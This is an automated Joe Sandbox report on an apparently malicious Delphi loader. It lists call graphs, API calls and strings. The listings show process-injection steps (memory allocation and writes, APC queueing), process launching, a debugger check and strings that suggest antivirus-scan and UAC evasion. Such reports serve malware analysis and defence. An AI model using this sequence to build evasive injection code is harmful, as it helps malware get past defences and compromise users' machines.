290d353 77281->77282 77283 28f4860 11 API calls 77282->77283 77284 290d36c 77283->77284 77285 28f47ec 11 API calls 77284->77285 77286 290d391 77285->77286 77287 29089d0 20 API calls 77286->77287 77288 290d3ac 77287->77288 77289 28f4860 11 API calls 77288->77289 77290 290d3c5 77289->77290 77291 28f47ec 11 API calls 77290->77291 77292 290d3ea 77291->77292 77293 29089d0 20 API calls 77292->77293 77294 290d405 77293->77294 77295 28f4860 11 API calls 77294->77295 77296 290d421 77295->77296 77297 28f47ec 11 API calls 77296->77297 77298 290d44c 77297->77298 77299 29089d0 20 API calls 77298->77299 77300 290d470 77299->77300 77301 28f4860 11 API calls 77300->77301 77302 290d48c 77301->77302 77303 28f47ec 11 API calls 77302->77303 77304 290d4bd 77303->77304 77305 29089d0 20 API calls 77304->77305 77306 290d4e1 77305->77306 77307 290d558 77306->77307 77309 28f4860 11 API calls 77306->77309 77308 28f4860 11 API calls 77307->77308 77310 290d574 77308->77310 77311 290d503 77309->77311 77312 28f47ec 11 API calls 77310->77312 77313 28f47ec 11 API calls 77311->77313 77314 290d5a5 77312->77314 77315 290d534 77313->77315 77316 29089d0 20 API calls 77314->77316 77317 29089d0 20 API calls 77315->77317 77318 290d5c9 77316->77318 77317->77307 77319 28f4860 11 API calls 77318->77319 77320 290d5e5 77319->77320 77321 28f47ec 11 API calls 77320->77321 77322 290d616 77321->77322 77323 29089d0 20 API calls 77322->77323 77324 290d63a 77323->77324 77325 28f4860 11 API calls 77324->77325 77326 290d656 77325->77326 77327 28f47ec 11 API calls 77326->77327 77328 290d687 77327->77328 77329 29089d0 20 API calls 77328->77329 77330 290d6ab 77329->77330 77331 28f2ee0 2 API calls 77330->77331 77332 290d6b0 77331->77332 77333 28f4860 11 API calls 77332->77333 77334 290d6e0 77333->77334 77335 28f47ec 11 API calls 77334->77335 77336 290d711 77335->77336 77337 29089d0 20 API calls 77336->77337 77338 290d735 77337->77338 77339 28f4860 11 API calls 77338->77339 77340 290d751 77339->77340 77341 28f47ec 11 API calls 77340->77341 77342 290d782 77341->77342 77343 29089d0 20 API calls 77342->77343 77344 290d7a6 77343->77344 77413 2907a2c 77344->77413 77347 290d835 77348 28f4860 11 API calls 77347->77348 77350 290d851 77348->77350 77349 28f4860 11 API calls 77351 290d7e0 77349->77351 77352 28f47ec 11 API calls 77350->77352 77353 28f47ec 11 API calls 77351->77353 77354 290d882 77352->77354 77355 290d811 77353->77355 77356 29089d0 20 API calls 77354->77356 77357 29089d0 20 API calls 77355->77357 77358 290d8a6 77356->77358 77357->77347 77359 28f4860 11 API calls 77358->77359 77360 290d8c2 77359->77360 77361 28f47ec 11 API calls 77360->77361 77362 290d8f3 77361->77362 77363 29089d0 20 API calls 77362->77363 77364 290d917 77363->77364 77365 2907d78 18 API calls 77364->77365 77366 290d92f 77365->77366 77367 28f4860 11 API calls 77366->77367 77368 290d94b 77367->77368 77369 28f47ec 11 API calls 77368->77369 77370 290d97c 77369->77370 77371 29089d0 20 API calls 77370->77371 77372 290d9a0 77371->77372 77373 28f4860 11 API calls 77372->77373 77374 290d9bc 77373->77374 77375 28f47ec 11 API calls 77374->77375 77376 290d9ed 77375->77376 77377 29089d0 20 API calls 77376->77377 77378 290da11 77377->77378 77379 28f4860 11 API calls 77378->77379 77380 290da2d 77379->77380 77381 28f47ec 11 API calls 77380->77381 77382 290da5e 77381->77382 77383 29089d0 20 API calls 77382->77383 77384 290da82 77383->77384 77385 28f4500 11 API calls 77384->77385 77386 290daa1 77385->77386 77386->76770 77388 29081cc 17 API calls 77387->77388 77389 2908742 77388->77389 77390 2908274 15 API calls 77389->77390 77391 2908748 NtQueueApcThread 77390->77391 77391->76860 77393 28f4530 11 API calls 77392->77393 77394 29085df 77393->77394 77395 28f4860 11 API calls 77394->77395 77396 29085fe 77395->77396 77397 29081cc 17 API calls 77396->77397 77398 2908611 77397->77398 77399 2908274 15 API calls 77398->77399 77400 2908617 WinExec 77399->77400 77401 2908639 77400->77401 77402 28f44dc 11 API calls 77401->77402 77403 2908641 77402->77403 77403->76543 77404->76602 77405->76761 77406->76816 77407->76936 77427 28f49a0 77408->77427 77411 28f7e71 77411->76767 77411->76768 77412->76613 77414 28f4530 11 API calls 77413->77414 77415 2907a51 77414->77415 77416 290798c 12 API calls 77415->77416 77417 2907a5e 77416->77417 77418 28f47ec 11 API calls 77417->77418 77419 2907a6b 77418->77419 77420 29081cc 17 API calls 77419->77420 77421 2907a7e 77420->77421 77422 2908274 15 API calls 77421->77422 77423 2907a84 NtAllocateVirtualMemory 77422->77423 77424 2907ab5 77423->77424 77425 28f4500 11 API calls 77424->77425 77426 2907ac2 77425->77426 77426->77347 77426->77349 77428 28f49a4 GetFileAttributesA 77427->77428 77428->77411 77429 291d2fc 77439 28f656c 77429->77439 77433 291d32a 77444 291c35c timeSetEvent 77433->77444 77435 291d334 77436 291d342 GetMessageA 77435->77436 77437 291d352 77436->77437 77438 291d336 TranslateMessage DispatchMessageA 77436->77438 77438->77436 77440 28f6577 77439->77440 77445 28f4198 77440->77445 77443 28f42ac SysFreeString SysReAllocStringLen SysAllocStringLen 77443->77433 77444->77435 77446 28f41de 77445->77446 77447 28f43e8 77446->77447 77448 28f4257 77446->77448 77450 28f4419 77447->77450 77454 28f442a 77447->77454 77459 28f4130 77448->77459 77464 28f435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 77450->77464 77453 28f4423 77453->77454 77455 28f446f FreeLibrary 77454->77455 77456 28f4493 77454->77456 77455->77454 77457 28f449c 77456->77457 77458 28f44a2 ExitProcess 77456->77458 77457->77458 77460 28f4140 77459->77460 77461 28f4173 77459->77461 77460->77461 77462 28f15cc VirtualAlloc 77460->77462 77465 28f5868 77460->77465 77461->77443 77462->77460 77464->77453 77466 28f5878 GetModuleFileNameA 77465->77466 77467 28f5894 77465->77467 77469 28f5acc GetModuleFileNameA RegOpenKeyExA 77466->77469 77467->77460 77470 28f5b4f 77469->77470 77471 28f5b0f RegOpenKeyExA 77469->77471 77487 28f5908 12 API calls 77470->77487 77471->77470 77472 28f5b2d RegOpenKeyExA 77471->77472 77472->77470 77474 28f5bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 77472->77474 77478 28f5c0f 77474->77478 77479 28f5cf2 77474->77479 77475 28f5b74 RegQueryValueExA 77476 28f5bb2 RegCloseKey 77475->77476 77477 28f5b94 RegQueryValueExA 77475->77477 77476->77467 77477->77476 77478->77479 77481 28f5c1f lstrlenA 77478->77481 77479->77467 77482 28f5c37 77481->77482 77482->77479 77483 28f5c5c lstrcpynA LoadLibraryExA 77482->77483 77484 28f5c84 77482->77484 77483->77484 77484->77479 77485 28f5c8e lstrcpynA LoadLibraryExA 77484->77485 77485->77479 77486 28f5cc0 lstrcpynA LoadLibraryExA 77485->77486 77486->77479 77487->77475

                                                          Executed Functions

                                                          Function 028F5ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 9232 28f5acc-28f5b0d GetModuleFileNameA RegOpenKeyExA 9233 28f5b4f-28f5b92 call 28f5908 RegQueryValueExA 9232->9233 9234 28f5b0f-28f5b2b RegOpenKeyExA 9232->9234 9239 28f5bb6-28f5bd0 RegCloseKey 9233->9239 9240 28f5b94-28f5bb0 RegQueryValueExA 9233->9240 9234->9233 9235 28f5b2d-28f5b49 RegOpenKeyExA 9234->9235 9235->9233 9237 28f5bd8-28f5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 9235->9237 9241 28f5c0f-28f5c13 9237->9241 9242 28f5cf2-28f5cf9 9237->9242 9240->9239 9243 28f5bb2 9240->9243 9245 28f5c1f-28f5c35 lstrlenA 9241->9245 9246 28f5c15-28f5c19 9241->9246 9243->9239 9247 28f5c38-28f5c3b 9245->9247 9246->9242 9246->9245 9248 28f5c3d-28f5c45 9247->9248 9249 28f5c47-28f5c4f 9247->9249 9248->9249 9250 28f5c37 9248->9250 9249->9242 9251 28f5c55-28f5c5a 9249->9251 9250->9247 9252 28f5c5c-28f5c82 lstrcpynA LoadLibraryExA 9251->9252 9253 28f5c84-28f5c86 9251->9253 9252->9253 9253->9242 9254 28f5c88-28f5c8c 9253->9254 9254->9242 9255 28f5c8e-28f5cbe lstrcpynA LoadLibraryExA 9254->9255 9255->9242 9256 28f5cc0-28f5cf0 lstrcpynA LoadLibraryExA 9255->9256 9256->9242
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,028F0000,0291E790), ref: 028F5AE8
                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5B06
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5B24
                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028F5B42
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028F5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028F5B8B
                                                          • RegQueryValueExA.ADVAPI32(?,028F5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028F5BD1,?,80000001), ref: 028F5BA9
                                                          • RegCloseKey.ADVAPI32(?,028F5BD8,00000000,?,?,00000000,028F5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028F5BCB
                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028F5BE8
                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028F5BF5
                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028F5BFB
                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028F5C26
                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C6D
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C7D
                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5CA5
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5CB5
                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028F5CDB
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028F5CEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                          • API String ID: 1759228003-2375825460
                                                          • Opcode ID: a6c78ca6f48611395a507d999f400ea91cb8a2521ed7642ead4d3760b49cd47c
                                                          • Instruction ID: 6af000a09ffe07b36c0fcf3e91767cae33e707c6a7b55c9c501a897eb4791729
                                                          • Opcode Fuzzy Hash: a6c78ca6f48611395a507d999f400ea91cb8a2521ed7642ead4d3760b49cd47c
                                                          • Instruction Fuzzy Hash: 7951887DA4025CBEFB61D7E8CC46FEF77AD9B04744F8001A1AB09E6181D7789A448FA1
                                                          Function 0290894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 11492 290894c-2908971 LoadLibraryW 11493 2908973-290898b GetProcAddress 11492->11493 11494 29089bb-29089c1 11492->11494 11495 29089b0-29089b6 FreeLibrary 11493->11495 11496 290898d-29089ac call 2907d78 11493->11496 11495->11494 11496->11495 11499 29089ae 11496->11499 11499->11495
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize,029773A8,0290A93C,UacScan), ref: 02908960
                                                          • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0290897A
                                                          • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize), ref: 029089B6
                                                            • Part of subcall function 02907D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                          • String ID: BCryptVerifySignature$bcrypt
                                                          • API String ID: 1002360270-4067648912
                                                          • Opcode ID: 060dcdd68f6b6a400e4aa5457fcba9d154af2ba29939fa3f688e6c3878d9fab9
                                                          • Instruction ID: 2ccf493237c37b7f74a768326b0eb57af9f104d832e1ab58e00336038c58047f
                                                          • Opcode Fuzzy Hash: 060dcdd68f6b6a400e4aa5457fcba9d154af2ba29939fa3f688e6c3878d9fab9
                                                          • Instruction Fuzzy Hash: 88F0AFB1EC8318AEF310A6E8B889FF7B79DA78071CF000929B91887180D6741858CF61
                                                          Function 0290F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 11509 290f744-290f75e GetModuleHandleW 11510 290f760-290f772 GetProcAddress 11509->11510 11511 290f78a-290f792 11509->11511 11510->11511 11512 290f774-290f784 CheckRemoteDebuggerPresent 11510->11512 11512->11511 11513 290f786 11512->11513 11513->11511
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(KernelBase), ref: 0290F754
                                                          • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0290F766
                                                          • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0290F77D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                          • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                          • API String ID: 35162468-539270669
                                                          • Opcode ID: f6508dc8c038deec1cb3e75601bff6753c4c17aa42e1f7651fcdba0b9bc486ff
                                                          • Instruction ID: 9e1ed026e5eddab8d10ee8e223a5afaa8ac5d1f0f6bc49ff8ff25e26faad3661
                                                          • Opcode Fuzzy Hash: f6508dc8c038deec1cb3e75601bff6753c4c17aa42e1f7651fcdba0b9bc486ff
                                                          • Instruction Fuzzy Hash: 48F0A77590425CBEEB20A6B888C87DCFBBD9B05328F2443919435A25C1FB792741CA52
                                                          Function 0290DD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 028F4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4F2E
                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DE40), ref: 0290DDAB
                                                          • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0290DE40), ref: 0290DDDB
                                                          • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0290DDF0
                                                          • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0290DE1C
                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0290DE25
                                                            • Part of subcall function 028F4C60: SysFreeString.OLEAUT32(0290F4A4), ref: 028F4C6E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                          • String ID:
                                                          • API String ID: 1897104825-0
                                                          • Opcode ID: b98bcdfebe9e709ca2103ad096d7d2a6a41439538f252c36307b52bcb7646710
                                                          • Instruction ID: 027ed8a6371d7de0aaaf5480b765060e7528ade98cbe48609a482f1998d16726
                                                          • Opcode Fuzzy Hash: b98bcdfebe9e709ca2103ad096d7d2a6a41439538f252c36307b52bcb7646710
                                                          • Instruction Fuzzy Hash: 3021BE75B4020CBEEB51EAD4CC92FDF77ADEB48700F510466B704E71C0DA74AA058B65
                                                          Function 0290E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0290E5F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CheckConnectionInternet
                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                          • API String ID: 3847983778-3852638603
                                                          • Opcode ID: 9db11b1c8a4a3d1a8d170355fa4ee9239984f26c456e7f9c4bc26f0b1db9fe43
                                                          • Instruction ID: 627e6808591b26e9978467c50870d13a64c0a73157bfd3ea4959b5a31f10e969
                                                          • Opcode Fuzzy Hash: 9db11b1c8a4a3d1a8d170355fa4ee9239984f26c456e7f9c4bc26f0b1db9fe43
                                                          • Instruction Fuzzy Hash: 6141133DB1010D9FEB41EBA8D881ADF73FAEF88700F104426E641E7291DA75AD018F56
                                                          Function 0290DC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 028F4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4F2E
                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DD5E), ref: 0290DCCB
                                                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0290DD05
                                                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0290DD32
                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0290DD3B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                          • String ID:
                                                          • API String ID: 3764614163-0
                                                          • Opcode ID: d26468430ccd821eb219e71989f0df07d9ffecffb1477917b21c3b93255d9c4a
                                                          • Instruction ID: e8420c104945df64d1083e9522e999341ef8384a0116834e78baffef3fb64886
                                                          • Opcode Fuzzy Hash: d26468430ccd821eb219e71989f0df07d9ffecffb1477917b21c3b93255d9c4a
                                                          • Instruction Fuzzy Hash: C621EC75A4020CBEEB50EAE4DD82FDEB7BDEB44B00F614466B704F75D0D7B0AA048A65
                                                          Function 02908788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02908814
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$CreateProcessUser
                                                          • String ID: CreateProcessAsUserW$Kernel32
                                                          • API String ID: 3130163322-2353454454
                                                          • Opcode ID: 2ab25c9bf07253820042cfb547c4e5dc3e34f08efc4b9ce2825b3eb75bcb4e5c
                                                          • Instruction ID: e1dd529cb2cbb7edeaa614cf30ed58d1f4d6fcecb874da78a75732943d02b836
                                                          • Opcode Fuzzy Hash: 2ab25c9bf07253820042cfb547c4e5dc3e34f08efc4b9ce2825b3eb75bcb4e5c
                                                          • Instruction Fuzzy Hash: 2011C5B5644248AFEB80EE9CDC81FAA77EDEB4C700F514461BA08D3280D634ED108B65
                                                          Function 02907A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02907A9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
